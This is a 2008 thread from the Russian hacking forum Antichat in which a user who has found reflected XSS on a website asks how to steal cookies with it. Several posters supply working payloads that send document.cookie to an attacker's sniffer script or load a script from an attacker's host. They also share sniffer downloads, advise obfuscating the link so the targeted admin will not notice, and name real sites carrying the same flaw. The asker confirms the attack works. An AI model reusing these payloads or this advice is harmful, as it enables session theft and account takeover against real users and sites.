Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пассивная ХСС (https://forum.antichat.xyz/showthread.php?t=96088)

Arigona 12.12.2008 19:56
Пассивная ХСС
 
Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.

Pashkela 12.12.2008 20:02
Дать тому, у кого хочешь свистнуть куки, такую ссылку:

/open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>

где s.php - твой снифер

[Dezzter] 12.12.2008 20:03
мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт

preda1or 12.12.2008 20:05
вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
http://depositfiles.com/files/d3gf1m5m9

p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
/open.php?url='<script src='http://www.blabla.ru/a.js'></script>

Arigona 12.12.2008 20:38
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.

+BemepoK+ 12.12.2008 20:45
Цитата:
Сообщение от Arigona
Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.
Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
Цитата:
Сообщение от Arigona
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
Это либо активка была

Arigona 12.12.2008 20:50
Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>

Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.

Pashkela 12.12.2008 20:56
Что значит "как"? Посты в теме читал вообще?

Arigona 12.12.2008 20:59
Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.

Pashkela 12.12.2008 21:07
"Просто тестировал над собой"

и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?

Вот правильный снифер, которым, например, пользуюсь давно уже:

Скачать снифер

Arigona 12.12.2008 21:21
Спасибо. Помог. Это типо нужно использовать так:

/open.php?url='<script src='http://мой сайт/снифер/s.gif'></script>

дык правильно?

BuG_4F 12.12.2008 21:24
http://www.mobile-warez.ru/redir.php?url='><script>alert(/xak/)</script>
Аналогичная хрень :)

Arigona 12.12.2008 21:27
BuG_4F, согласен) Просто учусь :) Вот и попросил помочь, если уж что кривое спросил вы меня простите :)

Pashkela 12.12.2008 21:27
Цитата:
Сообщение от Arigona
Спасибо. Помог. Это типо нужно использовать так:

/open.php?url='<script src='http://мой сайт/снифер/s.gif'></script>

дык правильно?
Нет, неправильно. Читай МОИ посты в этой теме. Остальные требуют уже некого понимания сути XSS и навыков

Arigona 12.12.2008 21:35
/open.php?url='<script>window.location.href='http://твой_сайт/s.gif?'+document.cookie;</script>

так значит?)

Pashkela 12.12.2008 21:36
Маладес

Arigona 12.12.2008 21:41
Спасибо, работает. Тему плз клосед :) Если что найду интересное поделюсь в халяве :)


Время: 21:10